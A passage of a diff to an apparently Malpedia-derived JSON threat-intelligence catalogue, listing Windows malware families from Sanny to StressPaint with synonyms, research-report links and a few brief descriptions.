[ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sanny", + "http://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html" + ] + }, + "uuid": "34c6504b-e947-49d8-a963-62b7594b7ef9", + "value": "Sanny", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Hussarini" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sarhust", + "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/bkdr_sarhust.a", + "https://www.fortinet.com/blog/threat-research/hussarini---targeted-cyber-attack-in-the-philippines.html" + ] + }, + "uuid": "5aed5403-9c52-4de6-9c8d-d29e5197ef7e", + "value": "Sarhust", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.satan", + "https://www.alienvault.com/blogs/labs-research/satan-ransomware-spawns-new-methods-to-spread", + "https://www.bleepingcomputer.com/news/security/new-satan-ransomware-available-through-a-ransomware-as-a-service-/", + "https://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html" + ] + }, + "uuid": "5639f7db-ab70-4b86-8a2f-9c4e3927ba91", + "value": "Satan Ransomware", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.satana", + "https://www.cylance.com/threat-spotlight-satan-raas" + ] + }, + "uuid": "09b555be-8bac-44b2-8741-922ee0b87880", + "value": "Satana", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sathurbot", + "https://www.welivesecurity.com/2017/04/06/sathurbot-distributed-wordpress-password-attack/" + ] + }, + "uuid": "bdc7cc9c-c46d-4f77-b903-2335cc1a3369", + "value": "Sathurbot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.scanpos", + "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware", + "https://www.morphick.com/resources/news/scanpos-new-pos-malware-being-distributed-kronos" + ] + }, + "uuid": "e3adbb0d-6d6e-4686-8108-ee76452339bf", + "value": "ScanPOS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.schneiken", + "https://engineering.salesforce.com/malware-analysis-new-trojan-double-dropper-5ed0a943adb", + "https://github.com/vithakur/schneiken" + ] + }, + "uuid": "92a65c89-acc3-4ee7-8db0-f0ea293ed12d", + "value": "Schneiken", + "description": "Schneiken is a VBS 'Double-dropper'. It comes with two RATs embedded in the code (Dunihi and Ratty). Entire code is Base64 encoded." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.scote", + "https://researchcenter.paloaltonetworks.com/2018/01/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/" + ] + }, + "uuid": "8c764bd6-2c6e-4cb2-93e3-f805cd99fe1e", + "value": "Scote", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.screenlocker", + "https://twitter.com/struppigel/status/791535679905927168" + ] + }, + "uuid": "9803b201-28e5-40c5-b661-c1a191388072", + "value": "ScreenLocker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.seadaddy", + "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" + ] + }, + "uuid": "1d07212e-6292-40a4-a5e9-30aef83b6207", + "value": "SeaDaddy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.seasalt", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "d66f466a-e70e-4b62-9a04-d62eb41da15c", + "value": "SeaSalt", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sedll", + "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" + ] + }, + "uuid": "272268bb-2715-476b-a121-49142581c559", + "value": "SeDll", + "description": "" + }, + { + "meta": { + "synonyms": [ + "azzy", + "eviltoss" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sedreco", + "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", + "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/", + "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf" + ] + }, + "uuid": "21ab9e14-602a-4a76-a308-dbf5d6a91d75", + "value": "Sedreco", + "description": "" + }, + { + "meta": { + "synonyms": [ + "jhuhugit", + "jkeyskw", + "downrage", + "carberplike" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.seduploader", + "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf", + "http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/", + "https://labsblog.f-secure.com/2015/09/08/sofacy-recycles-carberp-and-metasploit-code/", + "http://www.welivesecurity.com/2015/07/10/sednit-apt-group-meets-hacking-team/", + "http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/", + "https://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/", + "https://blog.xpnsec.com/apt28-hospitality-malware-part-2/", + "https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html", + "https://www.proofpoint.com/us/threat-insight/post/apt28-racing-exploit-cve-2017-11292-flash-vulnerability-patches-are-deployed", + "http://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html", + "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/" + ] + }, + "uuid": "6bd20349-1231-4aaa-ba2a-f4b09d3b344c", + "value": "Seduploader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sendsafe" + ] + }, + "uuid": "503ca41c-7788-477c-869b-ac530f20c490", + "value": "SendSafe", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.serpico" + ] + }, + "uuid": "0d4ca924-7e7e-4385-b14d-f504b4d206e5", + "value": "Serpico", + "description": "" + }, + { + "meta": { + "synonyms": [ + "XShellGhost" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowpad", + "https://securelist.com/shadowpad-in-corporate-networks/81432/", + "https://cdn.securelist.com/files/2017/08/ShadowPad_technical_description_PDF.pdf", + "http://www.dailysecu.com/?mod=bbs&act=download&bbs_id=bbs_10&upload_idxno=4070" + ] + }, + "uuid": "e089e945-a523-4d11-a135-396f9b6c1dc7", + "value": "ShadowPad", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.shakti", + "https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-technical-analysis/amp/", + "https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-stealing-documents/" + ] + }, + "uuid": "f64683c8-50ab-42c0-8b90-881598906528", + "value": "Shakti", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.shapeshift", + "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" + ] + }, + "uuid": "15dd8386-f11a-485a-b719-440c0a47dee6", + "value": "SHAPESHIFT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "remotecmd" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.shareip", + "https://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong" + ] + }, + "uuid": "6f9ed0b0-63c8-4f51-8425-17cfc2b3c12e", + "value": "shareip", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Bitrep" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpknot", + "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536.11.WHITE.pdf", + "https://eromang.zataz.com/tag/agentbase-exe/" + ] + }, + "uuid": "d31f1c73-d14b-41e2-bb16-81ee1d886e43", + "value": "SHARPKNOT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.shelllocker", + "https://twitter.com/JaromirHorejsi/status/813726714228604928" + ] + }, + "uuid": "af35e295-7087-4f6c-9f70-a431bf223822", + "value": "ShellLocker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.shifu", + "http://researchcenter.paloaltonetworks.com/2017/01/unit42-2016-updates-shifu-banking-trojan/" + ] + }, + "uuid": "6e668c0c-7085-4951-87d4-0334b6a5cdb3", + "value": "Shifu", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.shimrat", + "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf" + ] + }, + "uuid": "67fc358f-da6a-4f01-be23-44bc97319127", + "value": "Shim RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.shujin", + "https://blog.trendmicro.com/trendlabs-security-intelligence/chinese-language-ransomware-makes-appearance/", + "http://www.nyxbone.com/malware/chineseRansom.html" + ] + }, + "uuid": "77c20bd9-5403-4f99-bae5-c54f3f38a6b6", + "value": "Shujin", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.shurl0ckr", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/shurl0ckr-ransomware-as-a-service-peddled-on-dark-web-can-reportedly-bypass-cloud-applications" + ] + }, + "uuid": "f544ee0e-26f4-48e7-aaee-056f4d1ced82", + "value": "Shurl0ckr", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Caphaw" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.shylock", + "https://securityintelligence.com/merchant-of-fraud-returns-shylock-polymorphic-financial-malware-infections-on-the-rise/", + "https://securityintelligence.com/shylocks-new-trick-evading-malware-researchers/", + "https://www.europol.europa.eu/newsroom/news/global-action-targeting-shylock-malware", + "https://www.virusbulletin.com/virusbulletin/2015/02/paper-pluginer-caphaw", + "http://contagiodump.blogspot.com/2011/09/sept-21-greedy-shylock-financial.html", + "https://malwarereversing.wordpress.com/2011/09/27/debugging-injected-code-with-ida-pro/" + ] + }, + "uuid": "515ee69a-298a-4fcf-bdb0-c5fc6d41872f", + "value": "Shylock", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewinder", + "https://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c", + "https://s.tencent.com/research/report/479.html" + ] + }, + "uuid": "3c43bd4c-8c40-47b5-ae97-3dd0f0c0e8d8", + "value": "win.sidewinder", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Destover" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sierras", + "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", + "https://securingtomorrow.mcafee.com/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/" + ] + }, + "uuid": "da92c927-9b31-48aa-854a-8ed49a29565b", + "value": "Sierra(Alfa,Bravo, ...)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.siggen6" + ] + }, + "uuid": "c12b3e30-32bf-4b7e-98f6-6a00e95553f8", + "value": "Siggen6", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.silence", + "https://securelist.com/the-silence/83009/", + "http://www.intezer.com/silenceofthemoles/", + "https://www.group-ib.com/resources/threat-research/silence.html" + ] + }, + "uuid": "0df52c23-690b-4703-83f7-5befc38ab376", + "value": "Silence", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.silon", + "http://contagiodump.blogspot.com/2009/11/new-banking-trojan-w32silon-msjet51dll.html", + "http://www.internetnews.com/security/article.php/3846186/TwoHeaded+Trojan+Targets+Online+Banks.htm" + ] + }, + "uuid": "b602edb3-81c2-4772-b5f8-73deb85cb40a", + "value": "Silon", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.siluhdur" + ] + }, + "uuid": "774fcb67-1eeb-4bda-9b36-b624b632417a", + "value": "Siluhdur", + "description": "" + }, + { + "meta": { + "synonyms": [ + "iBank" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.simda", + "https://secrary.com/ReversingMalware/iBank/" + ] + }, + "uuid": "467ee29c-317f-481a-a77c-69961eb88c4d", + "value": "Simda", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Theola", + "Quarian", + "Mebroot", + "Anserin", + "Torpig" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sinowal", + "https://en.wikipedia.org/wiki/Torpig", + "https://www.symantec.com/security_response/writeup.jsp?docid=2008-010718-3448-99&tabid=2", + "https://www.welivesecurity.com/2013/03/13/how-theola-malware-uses-a-chrome-plugin-for-banking-fraud/", + "https://www.virusbulletin.com/virusbulletin/2014/06/sinowal-banking-trojan" + ] + }, + "uuid": "ad5bcaef-1a86-4cc7-8f2e-32306b995018", + "value": "Sinowal", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sisfader", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/june/cve-2017-8750-rtf-and-the-sisfader-rat/", + "https://medium.com/@Sebdraven/gobelin-panda-against-the-bears-1f462d00e3a4" + ] + }, + "uuid": "0fba78fc-47a1-45e1-b5df-71bcabd23b5d", + "value": "Sisfader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.skarab_ransom", + "http://malware-traffic-analysis.net/2017/11/23/index.html" + ] + }, + "uuid": "c1ccba65-e2f0-4f29-8e04-6b119c7f8694", + "value": "Skarab Ransom", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.skyplex" + ] + }, + "uuid": "39002a0d-99aa-4568-b110-48f6df1759cd", + "value": "Skyplex", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.slave", + "https://www.cert.pl/en/news/single/slave-banatrix-and-ransomware/" + ] + }, + "uuid": "1f4d8d42-8f31-47f8-b2b7-2d43196de532", + "value": "Slave", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.slingshot", + "https://securelist.com/apt-slingshot/84312/", + "https://s3-eu-west-1.amazonaws.com/khub-media/wp-content/uploads/sites/43/2018/03/09133534/The-Slingshot-APT_report_ENG_final.pdf", + "https://www.cyberscoop.com/kaspersky-slingshot-isis-operation-socom-five-eyes/" + ] + }, + "uuid": "d6178858-1244-41cf-aeed-8c6afc1d6846", + "value": "Slingshot", + "description": "- 2012 first sighted\r\n- Attack vector via compromised Microtik routers where victim's got infection when they connect to Microtik router admin software - Winbox\r\n- 2018 when discovered by Kaspersky Team\r\n\r\nInfection Vector\r\n- Infected Microtik Router > Malicious DLL (IP4.dll) in Router > User connect via windbox > Malicious DLL downloaded on computer" + }, + { + "meta": { + "synonyms": [ + "speccom" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.smac", + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/Aug.10.The_Italian_Connection_An_analysis_of_exploit_supply_chains_and_digital_quartermasters/HTExploitTelemetry.pdf" + ] + }, + "uuid": "a8561caf-eb9f-4a02-8277-a898a0a259ae", + "value": "smac", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Dofoil" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader", + "https://cloudblogs.microsoft.com/microsoftsecure/2018/04/04/hunting-down-dofoil-with-windows-defender-atp/", + "https://eternal-todo.com/blog/smokeloader-analysis-yulia-photo", + "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html", + "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/", + "https://info.phishlabs.com/blog/smoke-loader-adds-additional-obfuscation-methods-to-mitigate-analysis", + "https://www.spamhaus.org/news/article/774/smoke-loader-improves-encryption-after-microsoft-spoils-its-campaign", + "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet/", + "https://blog.malwarebytes.com/cybercrime/2018/01/fake-spectre-and-meltdown-patch-pushes-smoke-loader/", + "https://int0xcc.svbtle.com/a-taste-of-our-own-medicine-how-smokeloader-is-deceiving-dynamic-configuration-extraction-by-using-binary-code-as-bait", + "https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/", + "https://blog.badtrace.com/post/anti-hooking-checks-of-smokeloader-2018/", + "https://www.cert.pl/en/news/single/dissecting-smoke-loader/" + ] + }, + "uuid": "ba91d713-c36e-4d98-9fb7-e16496a69eec", + "value": "SmokeLoader", + "description": "The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body." + }, + { + "meta": { + "synonyms": [ + "Ismo" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.smominru", + "https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators", + "http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/" + ] + }, + "uuid": "26b91007-a8ae-4e32-bd99-292e44735c3d", + "value": "Smominru", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch_loader", + "https://myonlinesecurity.co.uk/your-order-no-8194788-has-been-processed-malspam-delivers-malware/", + "https://twitter.com/VK_Intel/status/898549340121288704", + "https://www.arbornetworks.com/blog/asert/snatchloader-reloaded/", + "https://zerophagemalware.com/2017/12/11/malware-snatch-loader-reloaded/" + ] + }, + "uuid": "467c726e-6e19-4d15-88b6-362cbe0b3d20", + "value": "SnatchLoader", + "description": "A downloader trojan with some infostealer capabilities focused on the browser. Previously observed as part of RigEK campaigns." + }, + { + "meta": { + "synonyms": [ + "ByeByeShell" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sneepy", + "https://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/" + ] + }, + "uuid": "212d1ed7-0519-412b-a1ce-56046ca93372", + "value": "SNEEPY", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Ursnif" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.snifula", + "https://www.circl.lu/assets/files/tr-13/tr-13-snifula-analysis-report-v1.3.pdf" + ] + }, + "uuid": "4f3ad937-bf2f-40cb-9695-a2bedfd41bfa", + "value": "Snifula", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.snojan", + "https://medium.com/@jacob16682/snojan-analysis-bb3982fb1bb9" + ] + }, + "uuid": "0646a6eb-1c13-4d87-878e-9431314597bf", + "value": "Snojan", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.snslocker" + ] + }, + "uuid": "99a10948-d7ba-4ad0-b73c-c7762143a193", + "value": "SNS Locker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sobaken", + "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/" + ] + }, + "uuid": "81e4fc8f-7b05-42bf-8ff9-568362d4f964", + "value": "Sobaken", + "description": "According to ESET, this RAT was derived from (the open-source) Quasar RAT." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.socks5_systemz" + ] + }, + "uuid": "38734f44-ebc4-4250-a20e-5dac0fb5c0ed", + "value": "Socks5 Systemz", + "description": "" + }, + { + "meta": { + "synonyms": [ + "BIRDDOG", + "Nadrac" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.socksbot", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://www.accenture.com/t00010101T000000Z__w__/gb-en/_acnmedia/PDF-83/Accenture-Goldfin-Security-Alert.pdf", + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" + ] + }, + "uuid": "da34bf80-6dc6-4b07-8094-8bed2c1176ec", + "value": "SocksBot", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Napolar" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.solarbot", + "https://www.welivesecurity.com/2013/09/25/win32napolar-a-new-bot-on-the-block/", + "https://blog.malwarebytes.com/threat-analysis/2013/09/new-solarbot-malware-debuts-creator-publicly-advertising/" + ] + }, + "uuid": "d61a1656-9413-46de-bd19-c7fe5eda3371", + "value": "Solarbot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.soraya", + "https://www.codeandsec.com/Soraya-Malware-Analysis-Dropper", + "https://www.arbornetworks.com/blog/asert/the-best-of-both-worlds-soraya/" + ] + }, + "uuid": "26aa3c43-5049-4a2e-bec1-9709b31a1a26", + "value": "soraya", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sorgu", + "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east" + ] + }, + "uuid": "bc135ba5-637b-46c9-94fc-2eef5e018bb5", + "value": "Sorgu", + "description": "" + }, + { + "meta": { + "synonyms": [ + "denis" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.soundbite", + "https://attack.mitre.org/wiki/Software/S0157", + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html" + ] + }, + "uuid": "f4cac204-3d3f-4bb6-84bd-fc27b2f5158c", + "value": "SOUNDBITE", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.spedear", + "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" + ] + }, + "uuid": "bd29030e-d440-4842-bc2a-c173ed938da4", + "value": "Spedear", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.spora_ransom", + "http://malware-traffic-analysis.net/2017/01/17/index2.html", + "https://github.com/MinervaLabsResearch/SporaVaccination", + "https://www.linkedin.com/pulse/spora-ransomware-understanding-hta-infection-vector-kevin-douglas", + "https://blog.malwarebytes.com/threat-analysis/2017/03/spora-ransomware/", + "https://nakedsecurity.sophos.com/2017/06/26/how-spora-ransomware-tries-to-fool-antivirus/", + "https://www.gdatasoftware.com/blog/2017/01/29442-spora-worm-and-ransomware" + ] + }, + "uuid": "7eeafa7c-0282-4667-bb1a-5ebc3a845d6d", + "value": "Spora", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.spybot" + ] + }, + "uuid": "34e9d701-22a1-4315-891d-443edd077abf", + "value": "SpyBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.spynet_rat" + ] + }, + "uuid": "", + "value": "", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.squirtdanger", + "https://researchcenter.paloaltonetworks.com/2018/04/unit42-squirtdanger-swiss-army-knife-malware-veteran-malware-author-thebottle/" + ] + }, + "uuid": "858a2cdb-9c89-436a-b8d4-60c725c7ac63", + "value": "SquirtDanger", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sslmm", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", + "https://securelist.com/analysis/publications/69953/the-naikon-apt/", + "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf" + ] + }, + "uuid": "009db412-762d-4256-8df9-eb213be01ffd", + "value": "SslMM", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.stabuniq", + "http://contagiodump.blogspot.com/2012/12/dec-2012-trojanstabuniq-samples.html", + "https://www.symantec.com/connect/blogs/trojanstabuniq-found-financial-institution-servers" + ] + }, + "uuid": "faa2196f-df4c-454c-995e-ded7864d5fa8", + "value": "Stabuniq", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.stampedo", + "https://www.bleepingcomputer.com/news/security/stampado-ransomware-campaign-decrypted-before-it-started/" + ] + }, + "uuid": "b1efbadf-26e5-4e35-8fd2-61642c30ecbf", + "value": "Stampedo", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.starcruft", + "https://securelist.com/operation-daybreak/75100/" + ] + }, + "uuid": "acd8fc63-c22a-4c11-907e-33e358fdd293", + "value": "StarCruft", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.starloader", + "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments" + ] + }, + "uuid": "f1decba9-6b3b-4636-a2b6-2208e178591a", + "value": "StarLoader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.starsypound", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "6df9bbd4-ab32-4d09-afdb-97eed274520a", + "value": "StarsyPound", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.stegoloader", + "https://www.secureworks.com/research/stegoloader-a-stealthy-information-stealer" + ] + }, + "uuid": "aea21616-061d-4177-9512-8887853394ed", + "value": "StegoLoader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.stinger" + ] + }, + "uuid": "82ab5235-a71e-4692-a08c-8db337d8b53a", + "value": "Stinger", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.stration" + ] + }, + "uuid": "0439c5ec-306e-4473-84f7-50bdb5539fc2", + "value": "Stration", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.stresspaint", + "https://security.radware.com/malware/stresspaint-malware-targeting-facebook-credentials/", + "https://arstechnica.com/information-technology/2018/04/tens-of-thousands-of-facebook-accounts-compromised-in-days-by-malware/", + 